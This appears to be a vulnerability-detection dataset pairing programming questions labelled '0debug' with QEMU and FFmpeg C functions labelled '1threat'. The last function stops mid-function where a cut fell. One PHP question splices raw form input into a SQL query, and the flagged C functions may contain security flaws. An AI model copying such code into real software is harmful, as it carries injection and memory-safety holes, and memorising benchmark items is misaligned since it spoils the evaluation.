| problem (string, lengths 26–131k) | labels (class label, 2 classes) |
|---|---|
How to apply styles to an nth child's inner div :
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-css -->
.outer:nth-child(3) > div{
color:red;
}
<!-- language: lang-html -->
<div class="outer">
<div>1st deep element</div>
<div>1st deep element</div>
<div>
<div>2nd deep element</div>
</div>
</div>
<!-- end snippet -->
How do I control the 2nd deep element's style using only the outer class selector?
| 0debug
|
Creating One Unique Array from 2 Arrays : I have 2 arrays (Arr1, Arr2). I am trying to create a single array that has as many objects in it as Arr1.length, where the format is:
[{name:Arr1[0], Arr2[0], Arr2[1]...etc}, {name:Arr1[1], Arr2[0], Arr2[1]...etc}..... etc]
I am working with proprietary information, so I cannot show the actual code. For the sake of simplicity, we will examine the two arrays:
Arr1 = [1,2,3,4,5] and
Arr2 = [6,7,8,9].
The resulting array should be:
[{1,6,7,8,9}, {2,6,7,8,9}, {3,6,7,8,9}, {4,6,7,8,9}, {5,6,7,8,9}]. I have used two for loops to manipulate the two arrays, but did not know if there was a method to call that would make this easier.
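For illustration only, a minimal sketch of the pairing logic in Python (the question does not pin down a language, and the key names below are hypothetical); the idea is one pass over Arr1, attaching every element of Arr2 to each object:
<pre><code>arr1 = [1, 2, 3, 4, 5]
arr2 = [6, 7, 8, 9]

# One object per element of arr1, each carrying all of arr2's values.
combined = [{"name": a, **{f"v{i}": b for i, b in enumerate(arr2)}}
            for a in arr1]

print(combined[0])  # {'name': 1, 'v0': 6, 'v1': 7, 'v2': 8, 'v3': 9}
</code></pre>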
| 0debug
|
Windows batch script to rename files that have random names? : <p>I need to make a Windows batch script to rename files that have random names. I have a folder with a thousand .txt files whose names are completely random,
and I want to rename the first 5 files in that folder to <code>file1.txt, file2.txt, file3.txt, file4.txt, file5.txt</code>.</p>
<p>Help appreciated.</p>
| 0debug
|
static uint64_t virtio_net_get_features(VirtIODevice *vdev, uint64_t features,
Error **errp)
{
VirtIONet *n = VIRTIO_NET(vdev);
NetClientState *nc = qemu_get_queue(n->nic);
features |= n->host_features;
virtio_add_feature(&features, VIRTIO_NET_F_MAC);
if (!peer_has_vnet_hdr(n)) {
virtio_clear_feature(&features, VIRTIO_NET_F_CSUM);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_TSO4);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_TSO6);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_ECN);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_CSUM);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_TSO4);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_TSO6);
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_ECN);
}
if (!peer_has_vnet_hdr(n) || !peer_has_ufo(n)) {
virtio_clear_feature(&features, VIRTIO_NET_F_GUEST_UFO);
virtio_clear_feature(&features, VIRTIO_NET_F_HOST_UFO);
}
if (!get_vhost_net(nc->peer)) {
return features;
}
return vhost_net_get_features(get_vhost_net(nc->peer), features);
}
| 1threat
|
static int blkdebug_co_flush(BlockDriverState *bs)
{
BDRVBlkdebugState *s = bs->opaque;
BlkdebugRule *rule = NULL;
QSIMPLEQ_FOREACH(rule, &s->active_rules, active_next) {
if (rule->options.inject.offset == -1) {
break;
}
}
if (rule && rule->options.inject.error) {
return inject_error(bs, rule);
}
return bdrv_co_flush(bs->file->bs);
}
| 1threat
|
Simple PHP T_print error : <pre><code>include 'connect.php';
msql_select_db("u972015033_jobss"); or die("Could not find DB");
if(isset($_POST['search'])){
$searchq = $_POST['search'];
$query = msql_query("SELECT * FROM job_search WHERE job_name LIKE '%$searchq%'"); or die("Could not find");
$count = mysql_num_rows($query);
if($count == 0){
$output = 'There was no results found';
else{
while($row = mysql_fetch_array($query)){
$jobname = $row['job_name'];
$jobdesc = $row['job_desc'];
$jobcomp = $row['job_company'];
$output .= '<div> '.$jobname.' '.$jobdesc.' '.$jobcomp.'</div>';
echo = "$output";
}
}
}
}
</code></pre>
<p>I don't know what the problem is; please help.
It's a basic script to query a database and display
the output.</p>
| 0debug
|
static void do_drive_backup(DriveBackup *backup, BlockJobTxn *txn, Error **errp)
{
BlockDriverState *bs;
BlockDriverState *target_bs;
BlockDriverState *source = NULL;
BdrvDirtyBitmap *bmap = NULL;
AioContext *aio_context;
QDict *options = NULL;
Error *local_err = NULL;
int flags;
int64_t size;
if (!backup->has_speed) {
backup->speed = 0;
}
if (!backup->has_on_source_error) {
backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
}
if (!backup->has_on_target_error) {
backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
}
if (!backup->has_mode) {
backup->mode = NEW_IMAGE_MODE_ABSOLUTE_PATHS;
}
if (!backup->has_job_id) {
backup->job_id = NULL;
}
bs = qmp_get_root_bs(backup->device, errp);
if (!bs) {
return;
}
aio_context = bdrv_get_aio_context(bs);
aio_context_acquire(aio_context);
if (!backup->has_format) {
backup->format = backup->mode == NEW_IMAGE_MODE_EXISTING ?
NULL : (char*) bs->drv->format_name;
}
if (bdrv_op_is_blocked(bs, BLOCK_OP_TYPE_BACKUP_SOURCE, errp)) {
goto out;
}
flags = bs->open_flags | BDRV_O_RDWR;
if (backup->sync == MIRROR_SYNC_MODE_TOP) {
source = backing_bs(bs);
if (!source) {
backup->sync = MIRROR_SYNC_MODE_FULL;
}
}
if (backup->sync == MIRROR_SYNC_MODE_NONE) {
source = bs;
}
size = bdrv_getlength(bs);
if (size < 0) {
error_setg_errno(errp, -size, "bdrv_getlength failed");
goto out;
}
if (backup->mode != NEW_IMAGE_MODE_EXISTING) {
assert(backup->format);
if (source) {
bdrv_img_create(backup->target, backup->format, source->filename,
source->drv->format_name, NULL,
size, flags, &local_err, false);
} else {
bdrv_img_create(backup->target, backup->format, NULL, NULL, NULL,
size, flags, &local_err, false);
}
}
if (local_err) {
error_propagate(errp, local_err);
goto out;
}
if (backup->format) {
options = qdict_new();
qdict_put(options, "driver", qstring_from_str(backup->format));
}
target_bs = bdrv_open(backup->target, NULL, options, flags, errp);
if (!target_bs) {
goto out;
}
bdrv_set_aio_context(target_bs, aio_context);
if (backup->has_bitmap) {
bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
if (!bmap) {
error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
bdrv_unref(target_bs);
goto out;
}
}
backup_start(backup->job_id, bs, target_bs, backup->speed, backup->sync,
bmap, backup->on_source_error, backup->on_target_error,
block_job_cb, bs, txn, &local_err);
bdrv_unref(target_bs);
if (local_err != NULL) {
error_propagate(errp, local_err);
goto out;
}
out:
aio_context_release(aio_context);
}
| 1threat
|
How to set a form as pristine? : <ul>
<li>The form that represents entity state is being edited (turns dirty)</li>
<li>The form is being submitted and entity state is now aligned with the form state which means that the form should now be set as pristine.</li>
</ul>
<p>How do we do that?
There was <code>$setPristine()</code> in ng1.
Btw, I'm talking about the <code>ControlGroup</code> type of form.</p>
| 0debug
|
Create single row python pandas dataframe : <p>I want to create a python pandas DataFrame with a single row, to use further pandas functionality like dumping to *.csv.</p>
<p>I have seen code like the following being used, but I end up with only the column structure and no data</p>
<pre><code>import pandas as pd
df = pd.DataFrame()
df['A'] = 1
df['B'] = 1.23
df['C'] = "Hello"
df.columns = [['A','B','C']]
print df
Empty DataFrame
Columns: [A, B, C]
Index: []
</code></pre>
<p>While I know there are other ways to do it (like from a dictionary), I want to understand why this piece of code is not working for me. Is this a version issue? (I'm using pandas==0.19.2.)</p>
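For reference, a minimal sketch of one way to get the single-row frame (the CSV file name below is only an example): assigning scalars to an empty DataFrame creates columns but no rows, because there is no index to broadcast against, so the data (or an explicit index) has to be supplied up front.
<pre><code>import pandas as pd

# Build the row directly; a list containing one dict yields one row.
df = pd.DataFrame([{"A": 1, "B": 1.23, "C": "Hello"}])
# Equivalent: pd.DataFrame({"A": [1], "B": [1.23], "C": ["Hello"]})

print(df)
df.to_csv("single_row.csv", index=False)
</code></pre>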
| 0debug
|
PPC_OP(check_reservation)
{
if ((uint32_t)env->reserve == (uint32_t)(T0 & ~0x00000003))
env->reserve = -1;
RETURN();
}
| 1threat
|
vmstate_get_subsection(const VMStateSubsection *sub, char *idstr)
{
while (sub && sub->needed) {
if (strcmp(idstr, sub->vmsd->name) == 0) {
return sub->vmsd;
}
sub++;
}
return NULL;
}
| 1threat
|
Repairing a PNG file : <p>I have been trying to work with this file. It is supposed to contain some kind of image, but I can't get it out. From a text editor I noticed this is a PNG file, but to me it shows up as a .zip ... Could somebody help me convert this to something I understand? Even a hint is okay.</p>
<p><a href="https://drive.google.com/file/d/0B_vZ8VW448TnWS0wajRVbGd5cEU/view?usp=sharing" rel="nofollow" title="Here is the file">Here is the file I am talking about</a></p>
| 0debug
|
int ff_h264_decode_slice_header(H264Context *h, H264SliceContext *sl, H264Context *h0)
{
unsigned int first_mb_in_slice;
unsigned int pps_id;
int ret;
unsigned int slice_type, tmp, i, j;
int default_ref_list_done = 0;
int last_pic_structure, last_pic_droppable;
int needs_reinit = 0;
int field_pic_flag, bottom_field_flag;
h->qpel_put = h->h264qpel.put_h264_qpel_pixels_tab;
h->qpel_avg = h->h264qpel.avg_h264_qpel_pixels_tab;
first_mb_in_slice = get_ue_golomb(&h->gb);
if (first_mb_in_slice == 0) {
if (h0->current_slice && h->cur_pic_ptr && FIELD_PICTURE(h)) {
ff_h264_field_end(h, sl, 1);
}
h0->current_slice = 0;
if (!h0->first_field) {
if (h->cur_pic_ptr && !h->droppable) {
ff_thread_report_progress(&h->cur_pic_ptr->tf, INT_MAX,
h->picture_structure == PICT_BOTTOM_FIELD);
}
h->cur_pic_ptr = NULL;
}
}
slice_type = get_ue_golomb_31(&h->gb);
if (slice_type > 9) {
av_log(h->avctx, AV_LOG_ERROR,
"slice type %d too large at %d %d\n",
slice_type, h->mb_x, h->mb_y);
return AVERROR_INVALIDDATA;
}
if (slice_type > 4) {
slice_type -= 5;
sl->slice_type_fixed = 1;
} else
sl->slice_type_fixed = 0;
slice_type = golomb_to_pict_type[slice_type];
if (slice_type == AV_PICTURE_TYPE_I ||
(h0->current_slice != 0 && slice_type == h0->last_slice_type)) {
default_ref_list_done = 1;
}
sl->slice_type = slice_type;
sl->slice_type_nos = slice_type & 3;
if (h->nal_unit_type == NAL_IDR_SLICE &&
sl->slice_type_nos != AV_PICTURE_TYPE_I) {
av_log(h->avctx, AV_LOG_ERROR, "A non-intra slice in an IDR NAL unit.\n");
return AVERROR_INVALIDDATA;
}
h->pict_type = sl->slice_type;
pps_id = get_ue_golomb(&h->gb);
if (pps_id >= MAX_PPS_COUNT) {
av_log(h->avctx, AV_LOG_ERROR, "pps_id %u out of range\n", pps_id);
return AVERROR_INVALIDDATA;
}
if (!h0->pps_buffers[pps_id]) {
av_log(h->avctx, AV_LOG_ERROR,
"non-existing PPS %u referenced\n",
pps_id);
return AVERROR_INVALIDDATA;
}
h->pps = *h0->pps_buffers[pps_id];
if (!h0->sps_buffers[h->pps.sps_id]) {
av_log(h->avctx, AV_LOG_ERROR,
"non-existing SPS %u referenced\n",
h->pps.sps_id);
return AVERROR_INVALIDDATA;
}
if (h->pps.sps_id != h->sps.sps_id ||
h0->sps_buffers[h->pps.sps_id]->new) {
h0->sps_buffers[h->pps.sps_id]->new = 0;
h->sps = *h0->sps_buffers[h->pps.sps_id];
if (h->bit_depth_luma != h->sps.bit_depth_luma ||
h->chroma_format_idc != h->sps.chroma_format_idc) {
h->bit_depth_luma = h->sps.bit_depth_luma;
h->chroma_format_idc = h->sps.chroma_format_idc;
needs_reinit = 1;
}
if ((ret = ff_h264_set_parameter_from_sps(h)) < 0)
return ret;
}
h->avctx->profile = ff_h264_get_profile(&h->sps);
h->avctx->level = h->sps.level_idc;
h->avctx->refs = h->sps.ref_frame_count;
if (h->mb_width != h->sps.mb_width ||
h->mb_height != h->sps.mb_height * (2 - h->sps.frame_mbs_only_flag))
needs_reinit = 1;
h->mb_width = h->sps.mb_width;
h->mb_height = h->sps.mb_height * (2 - h->sps.frame_mbs_only_flag);
h->mb_num = h->mb_width * h->mb_height;
h->mb_stride = h->mb_width + 1;
h->b_stride = h->mb_width * 4;
h->chroma_y_shift = h->sps.chroma_format_idc <= 1;
h->width = 16 * h->mb_width;
h->height = 16 * h->mb_height;
ret = init_dimensions(h);
if (ret < 0)
return ret;
if (h->sps.video_signal_type_present_flag) {
h->avctx->color_range = h->sps.full_range ? AVCOL_RANGE_JPEG
: AVCOL_RANGE_MPEG;
if (h->sps.colour_description_present_flag) {
if (h->avctx->colorspace != h->sps.colorspace)
needs_reinit = 1;
h->avctx->color_primaries = h->sps.color_primaries;
h->avctx->color_trc = h->sps.color_trc;
h->avctx->colorspace = h->sps.colorspace;
}
}
if (h->context_initialized && needs_reinit) {
if (h != h0) {
av_log(h->avctx, AV_LOG_ERROR,
"changing width %d -> %d / height %d -> %d on "
"slice %d\n",
h->width, h->avctx->coded_width,
h->height, h->avctx->coded_height,
h0->current_slice + 1);
return AVERROR_INVALIDDATA;
}
ff_h264_flush_change(h);
if ((ret = get_pixel_format(h)) < 0)
return ret;
h->avctx->pix_fmt = ret;
av_log(h->avctx, AV_LOG_INFO, "Reinit context to %dx%d, "
"pix_fmt: %d\n", h->width, h->height, h->avctx->pix_fmt);
if ((ret = h264_slice_header_init(h, 1)) < 0) {
av_log(h->avctx, AV_LOG_ERROR,
"h264_slice_header_init() failed\n");
return ret;
}
}
if (!h->context_initialized) {
if (h != h0) {
av_log(h->avctx, AV_LOG_ERROR,
"Cannot (re-)initialize context during parallel decoding.\n");
return AVERROR_PATCHWELCOME;
}
if ((ret = get_pixel_format(h)) < 0)
return ret;
h->avctx->pix_fmt = ret;
if ((ret = h264_slice_header_init(h, 0)) < 0) {
av_log(h->avctx, AV_LOG_ERROR,
"h264_slice_header_init() failed\n");
return ret;
}
}
if (h == h0 && h->dequant_coeff_pps != pps_id) {
h->dequant_coeff_pps = pps_id;
h264_init_dequant_tables(h);
}
h->frame_num = get_bits(&h->gb, h->sps.log2_max_frame_num);
h->mb_mbaff = 0;
h->mb_aff_frame = 0;
last_pic_structure = h0->picture_structure;
last_pic_droppable = h0->droppable;
h->droppable = h->nal_ref_idc == 0;
if (h->sps.frame_mbs_only_flag) {
h->picture_structure = PICT_FRAME;
} else {
field_pic_flag = get_bits1(&h->gb);
if (field_pic_flag) {
bottom_field_flag = get_bits1(&h->gb);
h->picture_structure = PICT_TOP_FIELD + bottom_field_flag;
} else {
h->picture_structure = PICT_FRAME;
h->mb_aff_frame = h->sps.mb_aff;
}
}
h->mb_field_decoding_flag = h->picture_structure != PICT_FRAME;
if (h0->current_slice != 0) {
if (last_pic_structure != h->picture_structure ||
last_pic_droppable != h->droppable) {
av_log(h->avctx, AV_LOG_ERROR,
"Changing field mode (%d -> %d) between slices is not allowed\n",
last_pic_structure, h->picture_structure);
h->picture_structure = last_pic_structure;
h->droppable = last_pic_droppable;
return AVERROR_INVALIDDATA;
} else if (!h0->cur_pic_ptr) {
av_log(h->avctx, AV_LOG_ERROR,
"unset cur_pic_ptr on slice %d\n",
h0->current_slice + 1);
return AVERROR_INVALIDDATA;
}
} else {
if (h->frame_num != h->prev_frame_num) {
int unwrap_prev_frame_num = h->prev_frame_num;
int max_frame_num = 1 << h->sps.log2_max_frame_num;
if (unwrap_prev_frame_num > h->frame_num)
unwrap_prev_frame_num -= max_frame_num;
if ((h->frame_num - unwrap_prev_frame_num) > h->sps.ref_frame_count) {
unwrap_prev_frame_num = (h->frame_num - h->sps.ref_frame_count) - 1;
if (unwrap_prev_frame_num < 0)
unwrap_prev_frame_num += max_frame_num;
h->prev_frame_num = unwrap_prev_frame_num;
}
}
if (h0->first_field) {
assert(h0->cur_pic_ptr);
assert(h0->cur_pic_ptr->f.buf[0]);
assert(h0->cur_pic_ptr->reference != DELAYED_PIC_REF);
if (!FIELD_PICTURE(h) || h->picture_structure == last_pic_structure) {
if (!last_pic_droppable && last_pic_structure != PICT_FRAME) {
ff_thread_report_progress(&h0->cur_pic_ptr->tf, INT_MAX,
last_pic_structure == PICT_TOP_FIELD);
}
} else {
if (h0->cur_pic_ptr->frame_num != h->frame_num) {
if (!last_pic_droppable && last_pic_structure != PICT_FRAME) {
ff_thread_report_progress(&h0->cur_pic_ptr->tf, INT_MAX,
last_pic_structure == PICT_TOP_FIELD);
}
} else {
if (!((last_pic_structure == PICT_TOP_FIELD &&
h->picture_structure == PICT_BOTTOM_FIELD) ||
(last_pic_structure == PICT_BOTTOM_FIELD &&
h->picture_structure == PICT_TOP_FIELD))) {
av_log(h->avctx, AV_LOG_ERROR,
"Invalid field mode combination %d/%d\n",
last_pic_structure, h->picture_structure);
h->picture_structure = last_pic_structure;
h->droppable = last_pic_droppable;
return AVERROR_INVALIDDATA;
} else if (last_pic_droppable != h->droppable) {
avpriv_request_sample(h->avctx,
"Found reference and non-reference fields in the same frame, which");
h->picture_structure = last_pic_structure;
h->droppable = last_pic_droppable;
return AVERROR_PATCHWELCOME;
}
}
}
}
while (h->frame_num != h->prev_frame_num &&
h->frame_num != (h->prev_frame_num + 1) % (1 << h->sps.log2_max_frame_num)) {
H264Picture *prev = h->short_ref_count ? h->short_ref[0] : NULL;
av_log(h->avctx, AV_LOG_DEBUG, "Frame num gap %d %d\n",
h->frame_num, h->prev_frame_num);
ret = h264_frame_start(h);
if (ret < 0) {
h0->first_field = 0;
return ret;
}
h->prev_frame_num++;
h->prev_frame_num %= 1 << h->sps.log2_max_frame_num;
h->cur_pic_ptr->frame_num = h->prev_frame_num;
ff_thread_report_progress(&h->cur_pic_ptr->tf, INT_MAX, 0);
ff_thread_report_progress(&h->cur_pic_ptr->tf, INT_MAX, 1);
ret = ff_generate_sliding_window_mmcos(h, 1);
if (ret < 0 && (h->avctx->err_recognition & AV_EF_EXPLODE))
return ret;
ret = ff_h264_execute_ref_pic_marking(h, h->mmco, h->mmco_index);
if (ret < 0 && (h->avctx->err_recognition & AV_EF_EXPLODE))
return ret;
if (h->short_ref_count) {
if (prev) {
av_image_copy(h->short_ref[0]->f.data,
h->short_ref[0]->f.linesize,
(const uint8_t **)prev->f.data,
prev->f.linesize,
h->avctx->pix_fmt,
h->mb_width * 16,
h->mb_height * 16);
h->short_ref[0]->poc = prev->poc + 2;
}
h->short_ref[0]->frame_num = h->prev_frame_num;
}
}
if (h0->first_field) {
assert(h0->cur_pic_ptr);
assert(h0->cur_pic_ptr->f.buf[0]);
assert(h0->cur_pic_ptr->reference != DELAYED_PIC_REF);
if (!FIELD_PICTURE(h) || h->picture_structure == last_pic_structure) {
h0->cur_pic_ptr = NULL;
h0->first_field = FIELD_PICTURE(h);
} else {
if (h0->cur_pic_ptr->frame_num != h->frame_num) {
h0->first_field = 1;
h0->cur_pic_ptr = NULL;
} else {
h0->first_field = 0;
}
}
} else {
h0->first_field = FIELD_PICTURE(h);
}
if (!FIELD_PICTURE(h) || h0->first_field) {
if (h264_frame_start(h) < 0) {
h0->first_field = 0;
return AVERROR_INVALIDDATA;
}
} else {
release_unused_pictures(h, 0);
}
}
if (h != h0 && (ret = clone_slice(h, h0)) < 0)
return ret;
h->cur_pic_ptr->frame_num = h->frame_num;
assert(h->mb_num == h->mb_width * h->mb_height);
if (first_mb_in_slice << FIELD_OR_MBAFF_PICTURE(h) >= h->mb_num ||
first_mb_in_slice >= h->mb_num) {
av_log(h->avctx, AV_LOG_ERROR, "first_mb_in_slice overflow\n");
return AVERROR_INVALIDDATA;
}
h->resync_mb_x = h->mb_x = first_mb_in_slice % h->mb_width;
h->resync_mb_y = h->mb_y = (first_mb_in_slice / h->mb_width) <<
FIELD_OR_MBAFF_PICTURE(h);
if (h->picture_structure == PICT_BOTTOM_FIELD)
h->resync_mb_y = h->mb_y = h->mb_y + 1;
assert(h->mb_y < h->mb_height);
if (h->picture_structure == PICT_FRAME) {
h->curr_pic_num = h->frame_num;
h->max_pic_num = 1 << h->sps.log2_max_frame_num;
} else {
h->curr_pic_num = 2 * h->frame_num + 1;
h->max_pic_num = 1 << (h->sps.log2_max_frame_num + 1);
}
if (h->nal_unit_type == NAL_IDR_SLICE)
get_ue_golomb(&h->gb);
if (h->sps.poc_type == 0) {
h->poc_lsb = get_bits(&h->gb, h->sps.log2_max_poc_lsb);
if (h->pps.pic_order_present == 1 && h->picture_structure == PICT_FRAME)
h->delta_poc_bottom = get_se_golomb(&h->gb);
}
if (h->sps.poc_type == 1 && !h->sps.delta_pic_order_always_zero_flag) {
h->delta_poc[0] = get_se_golomb(&h->gb);
if (h->pps.pic_order_present == 1 && h->picture_structure == PICT_FRAME)
h->delta_poc[1] = get_se_golomb(&h->gb);
}
ff_init_poc(h, h->cur_pic_ptr->field_poc, &h->cur_pic_ptr->poc);
if (h->pps.redundant_pic_cnt_present)
h->redundant_pic_count = get_ue_golomb(&h->gb);
ret = ff_set_ref_count(h, sl);
if (ret < 0)
return ret;
else if (ret == 1)
default_ref_list_done = 0;
if (!default_ref_list_done)
ff_h264_fill_default_ref_list(h, sl);
if (sl->slice_type_nos != AV_PICTURE_TYPE_I) {
ret = ff_h264_decode_ref_pic_list_reordering(h, sl);
if (ret < 0) {
sl->ref_count[1] = sl->ref_count[0] = 0;
return ret;
}
}
if ((h->pps.weighted_pred && sl->slice_type_nos == AV_PICTURE_TYPE_P) ||
(h->pps.weighted_bipred_idc == 1 &&
sl->slice_type_nos == AV_PICTURE_TYPE_B))
ff_pred_weight_table(h, sl);
else if (h->pps.weighted_bipred_idc == 2 &&
sl->slice_type_nos == AV_PICTURE_TYPE_B) {
implicit_weight_table(h, sl, -1);
} else {
sl->use_weight = 0;
for (i = 0; i < 2; i++) {
sl->luma_weight_flag[i] = 0;
sl->chroma_weight_flag[i] = 0;
}
}
if (h->nal_ref_idc) {
ret = ff_h264_decode_ref_pic_marking(h0, &h->gb,
!(h->avctx->active_thread_type & FF_THREAD_FRAME) ||
h0->current_slice == 0);
if (ret < 0 && (h->avctx->err_recognition & AV_EF_EXPLODE))
return AVERROR_INVALIDDATA;
}
if (FRAME_MBAFF(h)) {
ff_h264_fill_mbaff_ref_list(h, sl);
if (h->pps.weighted_bipred_idc == 2 && sl->slice_type_nos == AV_PICTURE_TYPE_B) {
implicit_weight_table(h, sl, 0);
implicit_weight_table(h, sl, 1);
}
}
if (sl->slice_type_nos == AV_PICTURE_TYPE_B && !sl->direct_spatial_mv_pred)
ff_h264_direct_dist_scale_factor(h, sl);
ff_h264_direct_ref_list_init(h, sl);
if (sl->slice_type_nos != AV_PICTURE_TYPE_I && h->pps.cabac) {
tmp = get_ue_golomb_31(&h->gb);
if (tmp > 2) {
av_log(h->avctx, AV_LOG_ERROR, "cabac_init_idc %u overflow\n", tmp);
return AVERROR_INVALIDDATA;
}
h->cabac_init_idc = tmp;
}
sl->last_qscale_diff = 0;
tmp = h->pps.init_qp + get_se_golomb(&h->gb);
if (tmp > 51 + 6 * (h->sps.bit_depth_luma - 8)) {
av_log(h->avctx, AV_LOG_ERROR, "QP %u out of range\n", tmp);
return AVERROR_INVALIDDATA;
}
sl->qscale = tmp;
sl->chroma_qp[0] = get_chroma_qp(h, 0, sl->qscale);
sl->chroma_qp[1] = get_chroma_qp(h, 1, sl->qscale);
if (sl->slice_type == AV_PICTURE_TYPE_SP)
get_bits1(&h->gb);
if (sl->slice_type == AV_PICTURE_TYPE_SP ||
sl->slice_type == AV_PICTURE_TYPE_SI)
get_se_golomb(&h->gb);
h->deblocking_filter = 1;
h->slice_alpha_c0_offset = 0;
h->slice_beta_offset = 0;
if (h->pps.deblocking_filter_parameters_present) {
tmp = get_ue_golomb_31(&h->gb);
if (tmp > 2) {
av_log(h->avctx, AV_LOG_ERROR,
"deblocking_filter_idc %u out of range\n", tmp);
return AVERROR_INVALIDDATA;
}
h->deblocking_filter = tmp;
if (h->deblocking_filter < 2)
h->deblocking_filter ^= 1;
if (h->deblocking_filter) {
h->slice_alpha_c0_offset = get_se_golomb(&h->gb) * 2;
h->slice_beta_offset = get_se_golomb(&h->gb) * 2;
if (h->slice_alpha_c0_offset > 12 ||
h->slice_alpha_c0_offset < -12 ||
h->slice_beta_offset > 12 ||
h->slice_beta_offset < -12) {
av_log(h->avctx, AV_LOG_ERROR,
"deblocking filter parameters %d %d out of range\n",
h->slice_alpha_c0_offset, h->slice_beta_offset);
return AVERROR_INVALIDDATA;
}
}
}
if (h->avctx->skip_loop_filter >= AVDISCARD_ALL ||
(h->avctx->skip_loop_filter >= AVDISCARD_NONKEY &&
sl->slice_type_nos != AV_PICTURE_TYPE_I) ||
(h->avctx->skip_loop_filter >= AVDISCARD_BIDIR &&
sl->slice_type_nos == AV_PICTURE_TYPE_B) ||
(h->avctx->skip_loop_filter >= AVDISCARD_NONREF &&
h->nal_ref_idc == 0))
h->deblocking_filter = 0;
if (h->deblocking_filter == 1 && h0->max_contexts > 1) {
if (h->avctx->flags2 & CODEC_FLAG2_FAST) {
h->deblocking_filter = 2;
} else {
h0->max_contexts = 1;
if (!h0->single_decode_warning) {
av_log(h->avctx, AV_LOG_INFO,
"Cannot parallelize deblocking type 1, decoding such frames in sequential order\n");
h0->single_decode_warning = 1;
}
if (h != h0) {
av_log(h->avctx, AV_LOG_ERROR,
"Deblocking switched inside frame.\n");
return 1;
}
}
}
sl->qp_thresh = 15 -
FFMIN(h->slice_alpha_c0_offset, h->slice_beta_offset) -
FFMAX3(0,
h->pps.chroma_qp_index_offset[0],
h->pps.chroma_qp_index_offset[1]) +
6 * (h->sps.bit_depth_luma - 8);
h0->last_slice_type = slice_type;
sl->slice_num = ++h0->current_slice;
if (sl->slice_num >= MAX_SLICES) {
av_log(h->avctx, AV_LOG_ERROR,
"Too many slices, increase MAX_SLICES and recompile\n");
}
for (j = 0; j < 2; j++) {
int id_list[16];
int *ref2frm = sl->ref2frm[sl->slice_num & (MAX_SLICES - 1)][j];
for (i = 0; i < 16; i++) {
id_list[i] = 60;
if (j < sl->list_count && i < sl->ref_count[j] &&
sl->ref_list[j][i].f.buf[0]) {
int k;
AVBuffer *buf = sl->ref_list[j][i].f.buf[0]->buffer;
for (k = 0; k < h->short_ref_count; k++)
if (h->short_ref[k]->f.buf[0]->buffer == buf) {
id_list[i] = k;
break;
}
for (k = 0; k < h->long_ref_count; k++)
if (h->long_ref[k] && h->long_ref[k]->f.buf[0]->buffer == buf) {
id_list[i] = h->short_ref_count + k;
break;
}
}
}
ref2frm[0] =
ref2frm[1] = -1;
for (i = 0; i < 16; i++)
ref2frm[i + 2] = 4 * id_list[i] + (sl->ref_list[j][i].reference & 3);
ref2frm[18 + 0] =
ref2frm[18 + 1] = -1;
for (i = 16; i < 48; i++)
ref2frm[i + 4] = 4 * id_list[(i - 16) >> 1] +
(sl->ref_list[j][i].reference & 3);
}
if (h->avctx->debug & FF_DEBUG_PICT_INFO) {
av_log(h->avctx, AV_LOG_DEBUG,
"slice:%d %s mb:%d %c%s%s pps:%u frame:%d poc:%d/%d ref:%d/%d qp:%d loop:%d:%d:%d weight:%d%s %s\n",
sl->slice_num,
(h->picture_structure == PICT_FRAME ? "F" : h->picture_structure == PICT_TOP_FIELD ? "T" : "B"),
first_mb_in_slice,
av_get_picture_type_char(sl->slice_type),
sl->slice_type_fixed ? " fix" : "",
h->nal_unit_type == NAL_IDR_SLICE ? " IDR" : "",
pps_id, h->frame_num,
h->cur_pic_ptr->field_poc[0],
h->cur_pic_ptr->field_poc[1],
sl->ref_count[0], sl->ref_count[1],
sl->qscale,
h->deblocking_filter,
h->slice_alpha_c0_offset, h->slice_beta_offset,
sl->use_weight,
sl->use_weight == 1 && sl->use_weight_chroma ? "c" : "",
sl->slice_type == AV_PICTURE_TYPE_B ? (sl->direct_spatial_mv_pred ? "SPAT" : "TEMP") : "");
}
return 0;
}
| 1threat
|
How would you handle getting new data from the server? : <p>Say you have an application that accesses a server. How would you handle getting new data from the server?</p>
| 0debug
|
How can I write a condition in PHP: if $x = 0 then $y = $z : **How can I write a condition in PHP:**
**if $x = 0 then $y = $z**
| 0debug
|
static void vfio_msi_enable(VFIOPCIDevice *vdev)
{
int ret, i;
vfio_disable_interrupts(vdev);
vdev->nr_vectors = msi_nr_vectors_allocated(&vdev->pdev);
retry:
vdev->msi_vectors = g_malloc0(vdev->nr_vectors * sizeof(VFIOMSIVector));
for (i = 0; i < vdev->nr_vectors; i++) {
VFIOMSIVector *vector = &vdev->msi_vectors[i];
MSIMessage msg = msi_get_message(&vdev->pdev, i);
vector->vdev = vdev;
vector->virq = -1;
vector->use = true;
if (event_notifier_init(&vector->interrupt, 0)) {
error_report("vfio: Error: event_notifier_init failed");
}
qemu_set_fd_handler(event_notifier_get_fd(&vector->interrupt),
vfio_msi_interrupt, NULL, vector);
vfio_add_kvm_msi_virq(vdev, vector, &msg, false);
}
vdev->interrupt = VFIO_INT_MSI;
ret = vfio_enable_vectors(vdev, false);
if (ret) {
if (ret < 0) {
error_report("vfio: Error: Failed to setup MSI fds: %m");
} else if (ret != vdev->nr_vectors) {
error_report("vfio: Error: Failed to enable %d "
"MSI vectors, retry with %d", vdev->nr_vectors, ret);
}
for (i = 0; i < vdev->nr_vectors; i++) {
VFIOMSIVector *vector = &vdev->msi_vectors[i];
if (vector->virq >= 0) {
vfio_remove_kvm_msi_virq(vector);
}
qemu_set_fd_handler(event_notifier_get_fd(&vector->interrupt),
NULL, NULL, NULL);
event_notifier_cleanup(&vector->interrupt);
}
g_free(vdev->msi_vectors);
if (ret > 0 && ret != vdev->nr_vectors) {
vdev->nr_vectors = ret;
goto retry;
}
vdev->nr_vectors = 0;
error_report("vfio: Error: Failed to enable MSI");
vdev->interrupt = VFIO_INT_NONE;
return;
}
trace_vfio_msi_enable(vdev->vbasedev.name, vdev->nr_vectors);
